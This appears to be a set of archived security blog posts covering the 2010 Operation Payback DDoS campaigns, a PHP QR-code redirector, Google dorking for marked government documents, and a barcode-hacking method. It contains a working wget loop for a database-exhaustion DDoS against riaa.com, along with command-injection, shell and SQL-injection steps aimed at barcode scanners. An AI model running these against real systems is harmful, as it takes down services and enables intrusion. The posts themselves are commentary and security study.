So for those of you keeping track at home:

• Indian firm Aiplex announced that they were launching Distribute Denial-of-Service (DDoS) attacks against The Pirate Bay. (the attack)
• The collective wisdom (Anonymous) of the Internet decided that in turn it would DDoS Aiplex, the MPAA, the RIAA, and their international counterparts in Operation Payback. (the counter-attack)
• Somebody has DDoS’ed the sites coordinating the attacks. (the counter-counter-attack)
• I’m popping up some popcorn to wait for the counter-counter-counter-attack and to watch the backscatter.

May we all live in interesting times, to say the least.  Some random thoughts I’m having about the DDoS campaigns:

• If people hate you enough to show up with signs outside your office to protest, they hate you enough to flood your network.
• Activist/vigilante/mob rule/protest has evolved to a very viable DDoS platform using a wide variety of operating systems.
• The DDoS campaign in 2008 against the Church of Scientology was called off by activist leaders, so now we’re seeing the unbridled fury of the Intertubez unleashed.
• On the tools side of things, I’ve seen some good development and some really creative methods to let non-technical folks to participate in the DDoS.
• Coordinating an activist army seems like the weak point in the model.

• Keeping Up With the DDoS Kids
• DDoS and Elections
• DojoCon DDoS Video
• The Rise of the Slow Denial of Service
• Apache Killer Effects on Target

So last week Anonymous staged a Distributed Denial of Service against the RIAA, MPAA, and Aiplex over Aiplex’s announcement that they were launching DDoS attacks of their own against torrent sites sharing copyrighted content.  In doing a bit of research on techniques that were being used, I came across this wonderful bit of script:

while true; do wget ‘http://riaa.com/goldandplatinumdata.php?table=SEARCH_RESULTS&title=&artist=&label=&format=&category=&type=&awardDescription=&startMonth=1&startYear=0&endMonth=12&endYear=2009&sort=Date&sense=ASC&perPage=5000000000&go=Search’ > /dev/null &  done

For those of you who don’t get it just yet, this is an awesome attack to study.  Basically what it does is to run an endless loop grabbing a search page url with parameters that will do a huge database query.  The beauty of the attack is that it’s “highly leveraged”: for one http get, you generate a sizeable amount of database load.  Now multiply that by thousands of yahoos out there running the same script, and it will rollover the target’s database server and possibly the applications servers that query it.

• A Little Story About a Tool Named #RefRef
• The Rise of the Slow Denial of Service
• Apache Killer Effects on Target
• DDoS and Elections
• DDoS Planning: Business Continuity with a Twist

In the spirit of Shockwave Rider’s information-sharing worm, the charm of StumbleUpon, and this xkcd cartoon:

And based on the fact that QR codes are “teh awesome”, I have created something both wonderful, inspiring, and evil all at the same time: a Random QR Code Redirector.  Just point your phone’s QR reader app at this barcode, sitback, and enjoy the mayhem.  Sometimes you get a neat hack url, sometimes you get a funny movie, sometimes you get information about barcodes, sometimes you get something that “once seen, cannot be unseen”.  Feel free to print them out and leave them places.  =)

And ta-da, the barcode:

Readme, Clickme!!!

Get a QR reader and other QR Code infos here.

“How’s it all work?”  Well, for starters I got a vanity domain at co.de (works swimmingly for software projects because, well, it’s “code”).  Then I built a database and ~15 lines of php code.  I make a weighted random select from the database and send a redirect to the browser.

Table create statement:

CREATE TABLE IF NOT EXISTS `qr_redirect_links` (
`id` smallint(3) NOT NULL auto_increment,
`url` varchar(1500) collate utf8_unicode_ci NOT NULL,
`weight` smallint(3) unsigned NOT NULL,
`comment` varchar(1500) collate utf8_unicode_ci NOT NULL,
PRIMARY KEY  (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci AUTO_INCREMENT=37 ;

The query code is as follows:

<?php
$con = mysql_connect(“<hostname>”,”<username>”,”<password>”);
if (!$con)
{
die(‘Could not connect: ‘ . mysql_error());

}

mysql_select_db(“random_urls”, $con);

//You could do a bunch of random select stuff in php but using the database Rand()*(1/Weight) is the easiest 1-liner I know to get a random result.

$result = mysql_query(“SELECT url FROM qr_redirect_links ORDER BY Rand()*(1/Weight) LIMIT 1;”);

while($row = mysql_fetch_array($result))
{
$newurl = $row[‘url’];
header( “Location: $newurl” ) ;//actually send the redirect here
}

mysql_close($con);
?>

I’m also collecting interesting urls, just email/twitter/whatever to me, the only rules are that they need to not harm the browser and I have final say on what meets my stringent url quality standards.

• Lolcats and QR Codes
• QR Code Temporary Tattoos Howto
• Barcode Hacking Process
• Barcode Hacking
• Keeping Up With the DDoS Kids

Ah yes, the magic of Google hacking and advanced operators.  All the “infosec cool kids” have been having a blast this week using a combination of filetype and site operators to look for classification markings in documents. I figure that with the WikiLeaks brouhaha lately, it might be a good idea to write a “howto” for government organizations to check for web leaks.

Now for the search string:, “enter document marking here” site:agency.gov filetype:rtf | filetype:ppt | filetype:pptx | filetype:csv | filetype:xls | filetype:xlsx | filetype:docx | filetype:doc | filetype:pdf looks for typical document formats on the agency.gov website looking for a specific caveat.  You could easily put in a key phrase used for marking sensitive documents in your agency.  Obviously there will be results from published organizational policy describing how to mark documents, but there will also be other things that should be looked at.

Typical document markings, all you have to do is pick out key phrases from your agency policy that have the verbatim disclaimer to put on docs:

• “This document contains sensitive security information”
• “Disclosure is prohibited”
• “This document contains confidential information”
• “Not for release”
• “No part of this document may be released”
• “Unauthorized release may result in civil penalty or other action”
• Any one of a thousand other key words listed on Wikipedia

Other ideas:

• Use the “site:gov” operator to look for documents government-wide.
• Drop the “site” operator altogether and look for agency information that has been published on the web by third parties.
• Chain the markings together with an “or” for one long search string: “not for release” | “no part of this document may be released” site:gov filetype:rtf | filetype:ppt | filetype:pptx | filetype:csv | filetype:xls | filetype:xlsx | filetype:docx | filetype:doc | filetype:pdf

If you’re not doing this already, I recommend setting up a weekly/daily search looking for documents that have been indexed and follow up on them as an incident.

• Clouds of CAG Confusion
• Database Activity Monitoring for the Government
• Ed Bellis’s Little SCAP Project
• Some Words From a FAR
• How to Not Let FISMA Become a Paperwork Exercise

With a shout-out to Chris Paget who generated some of the biggest buzz at Defcon with his GSM hacks.

• Lolcats Attend B-Sides
• Look Out, Sir Bruce, IKANHAZFIZMA is Coming for You
• Preparing for Cybergeddon
• Lolcats Coming to you from the Cloud
• Super Secret Security Control You Were Never Meant To See

This is something I’ve been working on in my spare brain cycles:  building a process for barcode hacking.

Limitations with barcode hacking:

• Feedback: is hard to get and depends on the scanner and the scanner app.  In other words, you really need access to a working setup to test any kind of techniques.  This isn’t web-based SQLi where you can compare the output against other results, you have to look “inside the guts” to see if a change happened.
• Reflections and Noise: Laser-based scanners have problems with reflection on phone screens.  This *almost* limits you to printed barcodes and reduces some of the interactivity.
• UPC: This symbology sucks for barcode hacking because you’re limited to 12 digits, no letters are supported.

Kernels of nummieness:

• Most modern barcodes are attached via USB and are recognized as a keyboard.
• Read the previous sentence again.  =)  You know what to do here.
• The USPS uses DataMatrix barcodes for postage.  These include command characters that “freak out” anything I read them on.  This has much potential, now if I can figure out how to harness this for the powers of mischief.
• I have a Symbol 2D barcode reader, you can buy them on eBay for ~$120.

The process should run something like this:

• Configuration injection: given the make and model of the scanner, turn on all available symbologies to increase the reader attack surfaces. These command sets are available from the manufacturer and there is a wealth of untapped firmware vulns in them.
• Discovery test: to determine which symbologies are supported by the barcode scanner.  The goal is to get something that supports the full ASCII set.  Code 128 (1D), PDF-417, QR, Aztec, and DataMatrix are your friends here.  For discovery, you can use “all 1’s” or something along those lines.
• Command injection: attempt to pass OS commands to the reader application and download and install a payload onto the OS via browser, ftp, etc or to gain a shell on the box.
• Application escape: Attempt to escape out of the application and into the OS.  Then it’s just a simple matter of regular exploits *or* if you’re lucky, you’re already admin.  At least try a ctrl-alt-del and see what happens.
• SQL injection: this you know, string concatenation that’s passed to the database.  The problem is that depending on the system, you might not get feedback so blind SQLi is harder.  “‘ or 1=1;–” probably won’t work because there isn’t really a login or when you’re scanning barcodes you’re already past that point.  I think the goal here should be command execution: add users, exec OS commands, and turn on additional services.
• Malformed barcode: as a last resort, try fuzzing with non-standards-compliant barcodes to get either the scanner or the application to barf.

BTW, all the kids with their barcodes that say “‘ or 1=1;–” crack me up because they’re being barcode skiddies and don’t understand how barcodes are really used.  =)

SQL Injection Bogus Example by ME!  Only you can stop the stupidity.

• Barcode Hacking
• QR Code Temporary Tattoos Howto
• Analyzing Fortify’s Plan to “Fix” the Government’s Security Problem
• Because Life Isn’t Random Enough
• A Little Story About a Tool Named #RefRef